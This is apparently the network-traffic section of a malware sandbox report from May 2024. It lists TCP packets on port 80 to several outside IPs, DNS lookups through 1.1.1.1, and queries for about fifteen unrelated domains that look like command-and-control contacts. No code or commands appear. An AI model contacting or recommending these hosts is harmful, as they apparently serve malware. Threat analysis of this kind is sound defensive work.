                            May 14, 2024 12:52:18.189229965 CEST4973580192.168.2.10178.211.137.59
                            May 14, 2024 12:52:18.192090034 CEST4973580192.168.2.10178.211.137.59
                            May 14, 2024 12:52:18.527920008 CEST8049735178.211.137.59192.168.2.10
                            May 14, 2024 12:52:18.528799057 CEST8049735178.211.137.59192.168.2.10
                            May 14, 2024 12:52:18.528820992 CEST8049735178.211.137.59192.168.2.10
                            May 14, 2024 12:52:18.529076099 CEST4973580192.168.2.10178.211.137.59
                            May 14, 2024 12:52:18.532078028 CEST4973580192.168.2.10178.211.137.59
                            May 14, 2024 12:52:18.866601944 CEST8049735178.211.137.59192.168.2.10
                            May 14, 2024 12:52:22.773607969 CEST4973180192.168.2.1052.175.38.24
                            May 14, 2024 12:52:23.083966970 CEST804973152.175.38.24192.168.2.10
                            May 14, 2024 12:52:23.182271004 CEST804973152.175.38.24192.168.2.10
                            May 14, 2024 12:52:33.262418032 CEST4973680192.168.2.10203.161.46.103
                            May 14, 2024 12:52:33.434715986 CEST8049736203.161.46.103192.168.2.10
                            May 14, 2024 12:52:33.434812069 CEST4973680192.168.2.10203.161.46.103
                            May 14, 2024 12:52:33.437197924 CEST4973680192.168.2.10203.161.46.103
                            May 14, 2024 12:52:33.609148979 CEST8049736203.161.46.103192.168.2.10
                            May 14, 2024 12:52:34.945102930 CEST4973680192.168.2.10203.161.46.103
                            May 14, 2024 12:52:34.968383074 CEST8049736203.161.46.103192.168.2.10
                            May 14, 2024 12:52:34.968410015 CEST8049736203.161.46.103192.168.2.10
                            May 14, 2024 12:52:34.968487024 CEST4973680192.168.2.10203.161.46.103
                            May 14, 2024 12:52:34.968487024 CEST4973680192.168.2.10203.161.46.103
                            May 14, 2024 12:52:35.118516922 CEST8049736203.161.46.103192.168.2.10
                            May 14, 2024 12:52:35.118577003 CEST4973680192.168.2.10203.161.46.103
                            May 14, 2024 12:52:35.963859081 CEST4973780192.168.2.10203.161.46.103
                            May 14, 2024 12:52:36.135977030 CEST8049737203.161.46.103192.168.2.10
                            May 14, 2024 12:52:36.136173964 CEST4973780192.168.2.10203.161.46.103
                            May 14, 2024 12:52:36.138067007 CEST4973780192.168.2.10203.161.46.103
                            May 14, 2024 12:52:36.310156107 CEST8049737203.161.46.103192.168.2.10
                            May 14, 2024 12:52:36.320085049 CEST8049737203.161.46.103192.168.2.10
                            May 14, 2024 12:52:36.320266008 CEST8049737203.161.46.103192.168.2.10
                            May 14, 2024 12:52:36.320461988 CEST4973780192.168.2.10203.161.46.103
                            May 14, 2024 12:52:37.648300886 CEST4973780192.168.2.10203.161.46.103
                            May 14, 2024 12:52:38.666908979 CEST4973880192.168.2.10203.161.46.103
                            May 14, 2024 12:52:38.839167118 CEST8049738203.161.46.103192.168.2.10
                            May 14, 2024 12:52:38.839262962 CEST4973880192.168.2.10203.161.46.103
                            May 14, 2024 12:52:38.841536999 CEST4973880192.168.2.10203.161.46.103
                            May 14, 2024 12:52:39.013542891 CEST8049738203.161.46.103192.168.2.10
                            May 14, 2024 12:52:39.023329973 CEST8049738203.161.46.103192.168.2.10
                            May 14, 2024 12:52:39.023353100 CEST8049738203.161.46.103192.168.2.10
                            May 14, 2024 12:52:39.023413897 CEST4973880192.168.2.10203.161.46.103
                            May 14, 2024 12:52:40.351056099 CEST4973880192.168.2.10203.161.46.103
                            May 14, 2024 12:52:41.370747089 CEST4973980192.168.2.10203.161.46.103
                            May 14, 2024 12:52:41.546386003 CEST8049739203.161.46.103192.168.2.10
                            May 14, 2024 12:52:41.546484947 CEST4973980192.168.2.10203.161.46.103
                            May 14, 2024 12:52:41.548527002 CEST4973980192.168.2.10203.161.46.103
                            May 14, 2024 12:52:41.720855951 CEST8049739203.161.46.103192.168.2.10
                            May 14, 2024 12:52:41.729816914 CEST8049739203.161.46.103192.168.2.10
                            May 14, 2024 12:52:41.729846954 CEST8049739203.161.46.103192.168.2.10
                            May 14, 2024 12:52:41.729998112 CEST4973980192.168.2.10203.161.46.103
                            May 14, 2024 12:52:41.732577085 CEST4973980192.168.2.10203.161.46.103
                            May 14, 2024 12:52:41.906363964 CEST8049739203.161.46.103192.168.2.10
                            May 14, 2024 12:52:56.429851055 CEST4974080192.168.2.10162.240.81.18
                            May 14, 2024 12:52:56.617276907 CEST8049740162.240.81.18192.168.2.10
                            May 14, 2024 12:52:56.617414951 CEST4974080192.168.2.10162.240.81.18
                            May 14, 2024 12:52:56.619450092 CEST4974080192.168.2.10162.240.81.18
                            May 14, 2024 12:52:56.806865931 CEST8049740162.240.81.18192.168.2.10
                            May 14, 2024 12:52:56.806896925 CEST8049740162.240.81.18192.168.2.10
                            May 14, 2024 12:52:56.806910992 CEST8049740162.240.81.18192.168.2.10
                            May 14, 2024 12:52:56.806927919 CEST8049740162.240.81.18192.168.2.10
                            May 14, 2024 12:52:56.807027102 CEST4974080192.168.2.10162.240.81.18
                            May 14, 2024 12:52:58.132474899 CEST4974080192.168.2.10162.240.81.18
                            May 14, 2024 12:52:59.150964022 CEST4974180192.168.2.10162.240.81.18
                            May 14, 2024 12:52:59.338361025 CEST8049741162.240.81.18192.168.2.10
                            May 14, 2024 12:52:59.338504076 CEST4974180192.168.2.10162.240.81.18
                            May 14, 2024 12:52:59.340507984 CEST4974180192.168.2.10162.240.81.18
                            May 14, 2024 12:52:59.527765989 CEST8049741162.240.81.18192.168.2.10
                            May 14, 2024 12:52:59.527796030 CEST8049741162.240.81.18192.168.2.10
                            May 14, 2024 12:52:59.527811050 CEST8049741162.240.81.18192.168.2.10
                            May 14, 2024 12:52:59.527827978 CEST8049741162.240.81.18192.168.2.10
                            May 14, 2024 12:52:59.528042078 CEST4974180192.168.2.10162.240.81.18
                            May 14, 2024 12:53:00.853511095 CEST4974180192.168.2.10162.240.81.18
                            May 14, 2024 12:53:01.872077942 CEST4974280192.168.2.10162.240.81.18
                            May 14, 2024 12:53:02.059747934 CEST8049742162.240.81.18192.168.2.10
                            May 14, 2024 12:53:02.059849977 CEST4974280192.168.2.10162.240.81.18
                            May 14, 2024 12:53:02.062321901 CEST4974280192.168.2.10162.240.81.18
                            May 14, 2024 12:53:02.249876022 CEST8049742162.240.81.18192.168.2.10
                            May 14, 2024 12:53:02.249901056 CEST8049742162.240.81.18192.168.2.10
                            May 14, 2024 12:53:02.249984026 CEST8049742162.240.81.18192.168.2.10
                            May 14, 2024 12:53:02.249999046 CEST8049742162.240.81.18192.168.2.10
                            May 14, 2024 12:53:02.250014067 CEST8049742162.240.81.18192.168.2.10
                            May 14, 2024 12:53:02.250041008 CEST4974280192.168.2.10162.240.81.18
                            May 14, 2024 12:53:02.250066042 CEST4974280192.168.2.10162.240.81.18
                            May 14, 2024 12:53:03.572084904 CEST4974280192.168.2.10162.240.81.18
                            May 14, 2024 12:53:04.590949059 CEST4974380192.168.2.10162.240.81.18
                            May 14, 2024 12:53:04.778718948 CEST8049743162.240.81.18192.168.2.10
                            May 14, 2024 12:53:04.778983116 CEST4974380192.168.2.10162.240.81.18
                            May 14, 2024 12:53:04.780849934 CEST4974380192.168.2.10162.240.81.18
                            May 14, 2024 12:53:04.968519926 CEST8049743162.240.81.18192.168.2.10
                            May 14, 2024 12:53:04.968566895 CEST8049743162.240.81.18192.168.2.10
                            May 14, 2024 12:53:04.968589067 CEST8049743162.240.81.18192.168.2.10
                            May 14, 2024 12:53:04.968607903 CEST8049743162.240.81.18192.168.2.10
                            May 14, 2024 12:53:04.968733072 CEST4974380192.168.2.10162.240.81.18
                            May 14, 2024 12:53:04.971317053 CEST4974380192.168.2.10162.240.81.18
                            May 14, 2024 12:53:05.158885956 CEST8049743162.240.81.18192.168.2.10
                            May 14, 2024 12:53:11.277514935 CEST4974480192.168.2.10103.93.125.69
                            May 14, 2024 12:53:11.591578960 CEST8049744103.93.125.69192.168.2.10
                            May 14, 2024 12:53:11.591675997 CEST4974480192.168.2.10103.93.125.69
                            May 14, 2024 12:53:11.593732119 CEST4974480192.168.2.10103.93.125.69
                            May 14, 2024 12:53:11.907850027 CEST8049744103.93.125.69192.168.2.10
                            May 14, 2024 12:53:11.908082008 CEST8049744103.93.125.69192.168.2.10
                            May 14, 2024 12:53:11.908174992 CEST8049744103.93.125.69192.168.2.10
                            May 14, 2024 12:53:11.908334017 CEST4974480192.168.2.10103.93.125.69
                            May 14, 2024 12:53:11.908356905 CEST8049744103.93.125.69192.168.2.10
                            May 14, 2024 12:53:11.908374071 CEST8049744103.93.125.69192.168.2.10
                            May 14, 2024 12:53:11.908400059 CEST8049744103.93.125.69192.168.2.10
                            May 14, 2024 12:53:11.908464909 CEST4974480192.168.2.10103.93.125.69
                            May 14, 2024 12:53:11.908464909 CEST4974480192.168.2.10103.93.125.69
                            May 14, 2024 12:53:13.104584932 CEST4974480192.168.2.10103.93.125.69
                            May 14, 2024 12:53:14.120289087 CEST4974580192.168.2.10103.93.125.69
                            May 14, 2024 12:53:14.436774969 CEST8049745103.93.125.69192.168.2.10
                            May 14, 2024 12:53:14.436939955 CEST4974580192.168.2.10103.93.125.69
                            May 14, 2024 12:53:14.440071106 CEST4974580192.168.2.10103.93.125.69
                            May 14, 2024 12:53:14.754199982 CEST8049745103.93.125.69192.168.2.10
                            May 14, 2024 12:53:14.754539013 CEST8049745103.93.125.69192.168.2.10
                            May 14, 2024 12:53:14.754587889 CEST8049745103.93.125.69192.168.2.10
                            May 14, 2024 12:53:14.754740000 CEST8049745103.93.125.69192.168.2.10
                            May 14, 2024 12:53:14.754760981 CEST8049745103.93.125.69192.168.2.10
                            May 14, 2024 12:53:14.754775047 CEST8049745103.93.125.69192.168.2.10
                            May 14, 2024 12:53:14.754873037 CEST4974580192.168.2.10103.93.125.69
                            May 14, 2024 12:53:14.754873037 CEST4974580192.168.2.10103.93.125.69
                            May 14, 2024 12:53:15.944999933 CEST4974580192.168.2.10103.93.125.69
                            May 14, 2024 12:53:16.964056969 CEST4974680192.168.2.10103.93.125.69
                            May 14, 2024 12:53:17.278235912 CEST8049746103.93.125.69192.168.2.10
                            May 14, 2024 12:53:17.278342962 CEST4974680192.168.2.10103.93.125.69
                            May 14, 2024 12:53:17.280714035 CEST4974680192.168.2.10103.93.125.69
                            May 14, 2024 12:53:17.594901085 CEST8049746103.93.125.69192.168.2.10
                            May 14, 2024 12:53:17.594997883 CEST8049746103.93.125.69192.168.2.10
                            May 14, 2024 12:53:17.595552921 CEST8049746103.93.125.69192.168.2.10
                            May 14, 2024 12:53:17.595664024 CEST8049746103.93.125.69192.168.2.10
                            May 14, 2024 12:53:17.595805883 CEST8049746103.93.125.69192.168.2.10
                            May 14, 2024 12:53:17.595822096 CEST8049746103.93.125.69192.168.2.10
                            May 14, 2024 12:53:17.595839024 CEST8049746103.93.125.69192.168.2.10
                            May 14, 2024 12:53:17.595942974 CEST4974680192.168.2.10103.93.125.69
                            May 14, 2024 12:53:17.595942974 CEST4974680192.168.2.10103.93.125.69
                            May 14, 2024 12:53:17.595942974 CEST4974680192.168.2.10103.93.125.69
                            May 14, 2024 12:53:18.789097071 CEST4974680192.168.2.10103.93.125.69
                            May 14, 2024 12:53:19.810091019 CEST4974780192.168.2.10103.93.125.69
                            May 14, 2024 12:53:20.124337912 CEST8049747103.93.125.69192.168.2.10
                            May 14, 2024 12:53:20.129705906 CEST4974780192.168.2.10103.93.125.69
                            May 14, 2024 12:53:20.139090061 CEST4974780192.168.2.10103.93.125.69
                            May 14, 2024 12:53:20.453218937 CEST8049747103.93.125.69192.168.2.10
                            May 14, 2024 12:53:20.453608036 CEST8049747103.93.125.69192.168.2.10
                            May 14, 2024 12:53:20.453738928 CEST8049747103.93.125.69192.168.2.10
                            May 14, 2024 12:53:20.453850985 CEST4974780192.168.2.10103.93.125.69
                            May 14, 2024 12:53:20.453932047 CEST8049747103.93.125.69192.168.2.10
                            May 14, 2024 12:53:20.453943968 CEST8049747103.93.125.69192.168.2.10
                            May 14, 2024 12:53:20.453960896 CEST8049747103.93.125.69192.168.2.10
                            May 14, 2024 12:53:20.454082966 CEST4974780192.168.2.10103.93.125.69
                            May 14, 2024 12:53:20.454082966 CEST4974780192.168.2.10103.93.125.69
                            May 14, 2024 12:53:20.457341909 CEST4974780192.168.2.10103.93.125.69
                            May 14, 2024 12:53:20.771469116 CEST8049747103.93.125.69192.168.2.10
                            May 14, 2024 12:53:36.103864908 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:36.420742989 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.422281981 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:36.428082943 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:36.744447947 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.855853081 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.855880022 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.855895042 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.855911016 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.855926037 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.855926037 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:36.855938911 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.855957031 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:36.855961084 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.855973959 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.855986118 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:36.855989933 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.856004000 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:36.856013060 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:36.856040955 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:37.172568083 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:37.172601938 CEST80497483.125.172.46192.168.2.10
                            May 14, 2024 12:53:37.172651052 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:37.930123091 CEST4974880192.168.2.103.125.172.46
                            May 14, 2024 12:53:38.948318958 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:39.273293018 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.273400068 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:39.276340008 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:39.600872040 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.668912888 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.668948889 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.668962002 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.668983936 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.668992043 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:39.668999910 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.669013977 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.669023991 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:39.669027090 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.669039965 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.669051886 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:39.669054985 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.669068098 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.669076920 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:39.669136047 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:39.993608952 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.993639946 CEST80497493.125.172.46192.168.2.10
                            May 14, 2024 12:53:39.994849920 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:40.791264057 CEST4974980192.168.2.103.125.172.46
                            May 14, 2024 12:53:41.807786942 CEST4975080192.168.2.103.125.172.46
                            May 14, 2024 12:53:42.120635986 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.127243042 CEST4975080192.168.2.103.125.172.46
                            May 14, 2024 12:53:42.129127026 CEST4975080192.168.2.103.125.172.46
                            May 14, 2024 12:53:42.441346884 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.441374063 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520596027 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520622015 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520637035 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520653009 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520675898 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520689964 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520704985 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520719051 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520724058 CEST4975080192.168.2.103.125.172.46
                            May 14, 2024 12:53:42.520731926 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520746946 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.520797968 CEST4975080192.168.2.103.125.172.46
                            May 14, 2024 12:53:42.520932913 CEST4975080192.168.2.103.125.172.46
                            May 14, 2024 12:53:42.832915068 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.832946062 CEST80497503.125.172.46192.168.2.10
                            May 14, 2024 12:53:42.834146976 CEST4975080192.168.2.103.125.172.46
                            May 14, 2024 12:53:43.632371902 CEST4975080192.168.2.103.125.172.46
                            May 14, 2024 12:53:44.651314974 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:44.970839024 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:44.970944881 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:44.973244905 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:45.291997910 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.361953020 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.361975908 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.361989021 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.362004042 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.362020016 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.362032890 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.362046957 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.362061977 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.362076044 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.362091064 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.362158060 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:45.362247944 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:45.681056976 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681080103 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681091070 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681099892 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681107998 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681123018 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681135893 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681148052 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681162119 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681175947 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681189060 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681201935 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681216002 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681229115 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681241989 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681247950 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:45.681256056 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681271076 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681283951 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681297064 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:45.681303978 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681319952 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:45.681339025 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:45.681365013 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:46.000263929 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:46.000287056 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:46.000307083 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:46.000653028 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:46.004939079 CEST4975180192.168.2.103.125.172.46
                            May 14, 2024 12:53:46.323760986 CEST80497513.125.172.46192.168.2.10
                            May 14, 2024 12:53:59.836765051 CEST4975280192.168.2.1091.195.240.19
                            May 14, 2024 12:54:00.142052889 CEST804975291.195.240.19192.168.2.10
                            May 14, 2024 12:54:00.142294884 CEST4975280192.168.2.1091.195.240.19
                            May 14, 2024 12:54:00.143940926 CEST4975280192.168.2.1091.195.240.19
                            May 14, 2024 12:54:00.449212074 CEST804975291.195.240.19192.168.2.10
                            May 14, 2024 12:54:00.449248075 CEST804975291.195.240.19192.168.2.10
                            May 14, 2024 12:54:00.449310064 CEST4975280192.168.2.1091.195.240.19
                            May 14, 2024 12:54:01.648082972 CEST4975280192.168.2.1091.195.240.19
                            May 14, 2024 12:54:02.666904926 CEST4975380192.168.2.1091.195.240.19
                            May 14, 2024 12:54:02.972090006 CEST804975391.195.240.19192.168.2.10
                            May 14, 2024 12:54:02.972193956 CEST4975380192.168.2.1091.195.240.19
                            May 14, 2024 12:54:02.974143028 CEST4975380192.168.2.1091.195.240.19
                            May 14, 2024 12:54:03.279397964 CEST804975391.195.240.19192.168.2.10
                            May 14, 2024 12:54:03.279426098 CEST804975391.195.240.19192.168.2.10
                            May 14, 2024 12:54:03.279495001 CEST4975380192.168.2.1091.195.240.19
                            May 14, 2024 12:54:04.476556063 CEST4975380192.168.2.1091.195.240.19
                            May 14, 2024 12:54:05.495829105 CEST4975480192.168.2.1091.195.240.19
                            May 14, 2024 12:54:05.801076889 CEST804975491.195.240.19192.168.2.10
                            May 14, 2024 12:54:05.801172972 CEST4975480192.168.2.1091.195.240.19
                            May 14, 2024 12:54:05.803603888 CEST4975480192.168.2.1091.195.240.19
                            May 14, 2024 12:54:06.108763933 CEST804975491.195.240.19192.168.2.10
                            May 14, 2024 12:54:06.108787060 CEST804975491.195.240.19192.168.2.10
                            May 14, 2024 12:54:06.108802080 CEST804975491.195.240.19192.168.2.10
                            May 14, 2024 12:54:06.108835936 CEST804975491.195.240.19192.168.2.10
                            May 14, 2024 12:54:08.338289976 CEST4975580192.168.2.1091.195.240.19
                            May 14, 2024 12:54:08.646246910 CEST804975591.195.240.19192.168.2.10
                            May 14, 2024 12:54:08.646384001 CEST4975580192.168.2.1091.195.240.19
                            May 14, 2024 12:54:08.648319006 CEST4975580192.168.2.1091.195.240.19
                            May 14, 2024 12:54:08.956393957 CEST804975591.195.240.19192.168.2.10
                            May 14, 2024 12:54:08.956422091 CEST804975591.195.240.19192.168.2.10
                            May 14, 2024 12:54:08.956573963 CEST4975580192.168.2.1091.195.240.19
                            May 14, 2024 12:54:08.959526062 CEST4975580192.168.2.1091.195.240.19
                            May 14, 2024 12:54:09.267433882 CEST804975591.195.240.19192.168.2.10

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            May 14, 2024 12:50:57.877300978 CEST6119053192.168.2.101.1.1.1
                            May 14, 2024 12:50:58.327395916 CEST53611901.1.1.1192.168.2.10
                            May 14, 2024 12:51:14.042485952 CEST6042953192.168.2.101.1.1.1
                            May 14, 2024 12:51:14.205104113 CEST53604291.1.1.1192.168.2.10
                            May 14, 2024 12:51:22.261451006 CEST6254053192.168.2.101.1.1.1
                            May 14, 2024 12:51:22.663315058 CEST53625401.1.1.1192.168.2.10
                            May 14, 2024 12:51:36.964788914 CEST6457553192.168.2.101.1.1.1
                            May 14, 2024 12:51:37.799149036 CEST53645751.1.1.1192.168.2.10
                            May 14, 2024 12:51:52.917279959 CEST4950753192.168.2.101.1.1.1
                            May 14, 2024 12:51:53.415422916 CEST53495071.1.1.1192.168.2.10
                            May 14, 2024 12:52:07.590001106 CEST6154753192.168.2.101.1.1.1
                            May 14, 2024 12:52:08.099003077 CEST53615471.1.1.1192.168.2.10
                            May 14, 2024 12:52:23.542725086 CEST5042753192.168.2.101.1.1.1
                            May 14, 2024 12:52:23.705004930 CEST53504271.1.1.1192.168.2.10
                            May 14, 2024 12:52:32.920592070 CEST5871553192.168.2.101.1.1.1
                            May 14, 2024 12:52:33.259222031 CEST53587151.1.1.1192.168.2.10
                            May 14, 2024 12:52:46.746628046 CEST5852753192.168.2.101.1.1.1
                            May 14, 2024 12:52:46.909271955 CEST53585271.1.1.1192.168.2.10
                            May 14, 2024 12:52:56.199595928 CEST5989153192.168.2.101.1.1.1
                            May 14, 2024 12:52:56.426670074 CEST53598911.1.1.1192.168.2.10
                            May 14, 2024 12:53:09.980492115 CEST5704153192.168.2.101.1.1.1
                            May 14, 2024 12:53:10.991921902 CEST5704153192.168.2.101.1.1.1
                            May 14, 2024 12:53:11.274075985 CEST53570411.1.1.1192.168.2.10
                            May 14, 2024 12:53:11.274107933 CEST53570411.1.1.1192.168.2.10
                            May 14, 2024 12:53:26.669816971 CEST6252953192.168.2.101.1.1.1
                            May 14, 2024 12:53:26.837361097 CEST53625291.1.1.1192.168.2.10
                            May 14, 2024 12:53:34.902766943 CEST6083553192.168.2.101.1.1.1
                            May 14, 2024 12:53:35.898222923 CEST6083553192.168.2.101.1.1.1
                            May 14, 2024 12:53:36.097302914 CEST53608351.1.1.1192.168.2.10
                            May 14, 2024 12:53:36.097326040 CEST53608351.1.1.1192.168.2.10
                            May 14, 2024 12:53:51.011476994 CEST6458453192.168.2.101.1.1.1
                            May 14, 2024 12:53:51.175049067 CEST53645841.1.1.1192.168.2.10
                            May 14, 2024 12:53:59.378139973 CEST5186753192.168.2.101.1.1.1
                            May 14, 2024 12:53:59.826800108 CEST53518671.1.1.1192.168.2.10
                            May 14, 2024 12:54:13.968076944 CEST6114853192.168.2.101.1.1.1
                            May 14, 2024 12:54:14.134896994 CEST53611481.1.1.1192.168.2.10

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                            May 14, 2024 12:50:57.877300978 CEST192.168.2.101.1.1.10x7d36Standard query (0)www.maxiwalls.comA (IP address)IN (0x0001)false
                            May 14, 2024 12:51:14.042485952 CEST192.168.2.101.1.1.10xc178Standard query (0)www.choosejungmann.comA (IP address)IN (0x0001)false
                            May 14, 2024 12:51:22.261451006 CEST192.168.2.101.1.1.10xfbbaStandard query (0)www.paydayloans3.shopA (IP address)IN (0x0001)false
                            May 14, 2024 12:51:36.964788914 CEST192.168.2.101.1.1.10xd609Standard query (0)www.colchondealquiler.comA (IP address)IN (0x0001)false
                            May 14, 2024 12:51:52.917279959 CEST192.168.2.101.1.1.10x1a71Standard query (0)www.www60270.xyzA (IP address)IN (0x0001)false
                            May 14, 2024 12:52:07.590001106 CEST192.168.2.101.1.1.10xfd91Standard query (0)www.skibinscy-finanse.plA (IP address)IN (0x0001)false
                            May 14, 2024 12:52:23.542725086 CEST192.168.2.101.1.1.10x25bfStandard query (0)www.avoshield.comA (IP address)IN (0x0001)false
                            May 14, 2024 12:52:32.920592070 CEST192.168.2.101.1.1.10x7692Standard query (0)www.fairmarty.topA (IP address)IN (0x0001)false
                            May 14, 2024 12:52:46.746628046 CEST192.168.2.101.1.1.10x7e0fStandard query (0)www.theertyuiergthjk.homesA (IP address)IN (0x0001)false
                            May 14, 2024 12:52:56.199595928 CEST192.168.2.101.1.1.10xfa44Standard query (0)www.aprovapapafox.comA (IP address)IN (0x0001)false
                            May 14, 2024 12:53:09.980492115 CEST192.168.2.101.1.1.10x9feeStandard query (0)www.83634.cnA (IP address)IN (0x0001)false
                            May 14, 2024 12:53:10.991921902 CEST192.168.2.101.1.1.10x9feeStandard query (0)www.83634.cnA (IP address)IN (0x0001)false
                            May 14, 2024 12:53:26.669816971 CEST192.168.2.101.1.1.10x4173Standard query (0)www.polhi.lolA (IP address)IN (0x0001)false
                            May 14, 2024 12:53:34.902766943 CEST192.168.2.101.1.1.10x7d2Standard query (0)www.valentinaetommaso.itA (IP address)IN (0x0001)false
                            May 14, 2024 12:53:35.898222923 CEST192.168.2.101.1.1.10x7d2Standard query (0)www.valentinaetommaso.itA (IP address)IN (0x0001)false
                            May 14, 2024 12:53:51.011476994 CEST192.168.2.101.1.1.10xb6a8Standard query (0)www.toyzonetshirts.comA (IP address)IN (0x0001)false
